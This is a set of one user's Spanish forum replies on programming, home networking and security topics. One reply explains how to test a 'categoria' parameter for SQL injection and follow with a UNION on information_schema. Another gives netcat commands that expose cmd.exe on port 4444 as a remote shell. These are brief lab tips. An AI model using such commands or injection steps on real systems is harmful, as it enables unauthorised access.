Mensajes

Hola,

Posiblemente exista una clase Alumno, yo pondria esa propiedad en la clase Alumno sin problemas.

No se si es necesaria la creación de una clase Examen, depende de tu problema.
Si el examen tiene fecha, hora, tipo, dificultad, lugar, asignatura, etc. quizá si sea una buena opción crearla, en ese caso podrias crear una clase asociativa más que una propiedad.

Salu2.

Aqui hay un problema de conceptos.
Si tu tienes una maquina virtual es como tener una maquina mas. Suponiendo que tengas la iface en modo bridge tienes una ip mas en tu rango por lo tanto tienes

1.100 maquina fisica
1.102 la virtual por ejemplo

Utilizar no-ip es para crear un nombre de dominio asociado a tu IP publica. Asi pues tienes que crear un fordward / natting hacia una de las ips privadas. Sólo pasaras hacia una IP privada.

Es un tema de configurar tu router / firrwall.

Salu2

Quiere decir que posiblemente es vulnerable.
Para confirmartelo te propongo lo siguiente.

Imagina que categoria=1

Te da un resultado correcto

Si agregando esto
Categoria=1 and 1>2

Te da error y
Categoria=1 and 1=1

Te muestra el mismo resultado que al inicio quiere decir que si es vulnerable. Luego puedes buscar el numero de columnas e intentar hacer un union con information schema.

Salu2

Hola,

Muy cierto kub0x es que netcat de linux no tiene ese parametro.
Gracias por recalcarlo

Salu2

Hola,

No acabo de enteder o visualizar tu código es posible que pegues alguna parte?
Estas rellenando un arraylist con valores de una clase estatica?

Cuando dices registros te refieres a propiedades o el return de algun método estatico?

Hola,

Las máquinas se ven entre ellas?

Tu windows tiene que tener netcat así:
Nc -vnlp 4444 -e cmd.exe

Tu linux
Nc -nv ip.win7 4444

Esto te devuelve una reverse shell en tu linux. Es decir accederas al cmd.exe de win desde tu linux.

Salu2

Pd: se m olvidava
ips locales

Hola,

Si ya lo hiciste sobre LAN ya tienes el ejemplo.

La diferencia en este caso es que tu cliente tiene que apuntar a la IP pública.
Y donde tengas tu servidor, tienes que configurar tu router / firewall para hacer NAT y que haga un forward del puerto.

Más que modificar el programa, es configurar tu red.

Salu2

Hola,

Se que el mensaje es ya antiguo, pero com traigo la solución pues la posteo:

Este es el código que si funciona:

Código [Seleccionar] Expandir

<?php

$password = "mi_pass";
$user = "Administrador";

// Elimino previamente la unidad por si existiera (para hacer F5 en el ejemplo básicamente)
if (system("net use z: /del > nul", $red)){
echo "<br/> Eliminado";
}

// Mapeamos la unidad 
if (system("net use z: \\\\127.0.0.1\\c$ $password /user:$user", $red)){
echo "Unidad Mapada";
} else {
echo "Error"; //para ver qué error, hay que leer error.log de apache.
}

if (file_exists("Z:")){
echo "<br/>La unidad existe<br/>";
system("dir Z:");
} else {
echo "<br/>La unidad no existe";
}

?>

Al final es apache quien mapea la unidad mediante PHP y entonces si que puedes trabajar con la unidad.

Salu2

Hola,

Comunmente estas aplicaciones web, utilizan hashes y criptografía para ocultar un enlace directo al archivo. De hecho cuando megaupload estaba vivo como tal, se descubrió cómo era su función de hash para descubrir su link directo de descarga:

ejemplo:
megaupload.com

archivo:
v de vendetta

$archivoFinal  = myHashing("v de vendetta");
$archivoFinal == Hy23Dfgg4
$finalUrl = megaupload.com/file/$archivoFinal
megaupload.com/Hy23Dfgg4 == "direct link v de vendetta"

método directo? No sé si existiran aplicaciones o no, pero un criptoanálisis  o hashing cracking pueden ser la respuesta. Generalmente los cáculos estan en el servidor, es decir que sólo podrás ver el código fuente ( una vez hayas esperado los X segundos).


Salu2

[scripting]

Hola a todos,

Personamente me gusta Java como lenguaje de programación.
Python, siendo un lenguage de scripting me encanta, me parece rápido y eficaz.

Aprendí con pascal (hace...tanto... jejeje; que si que es un lenguaje estricto) y tiré por C, hasta acabar con la orientación a objetos (Java por mi parte). Un IDE, como tal.. eclipse.

Pero respondiendo a tu pregunta (que me gusta de un lenguaje, no qué lenguaje):

En un lenguaje de programación me gusta su acercamiento humano (cuidado,que ASM me gusta para una finalidad, tengo mi paciencia) , sus facilidades (librerías, facilidad de escalar (plugins propios, apis,  etc.)) y su documentación. Esto es una opinión personal, un gran ejemplo es Java como ya he mencionado o por ejemplo PHP, que aún siendo un lenguaje de scripting (como python, perl ,etc) me gusta su flexibilidad  y como se amolda (posibilidad de trabajar con clases, ORM, facilidad para hacer desde una chorrada o algo grande nivel web (a diferencia de Java: desplegar el código ,etc.))

OllyDBG y GDB son lo mismo sin serlo, he utilzado los dos, pero siendo usuario de Linux prefiero por supuesto GDB, al final todo depende de que practicas y que te acaba siendo más cómodo, o cual sea tu finalidad (un exploit para Windows => ollydbg, immunity debugger, ida pro,...; exploit para linux => gdb (cli), edb (gráfico), ida pro (gráfico),...)

Salu2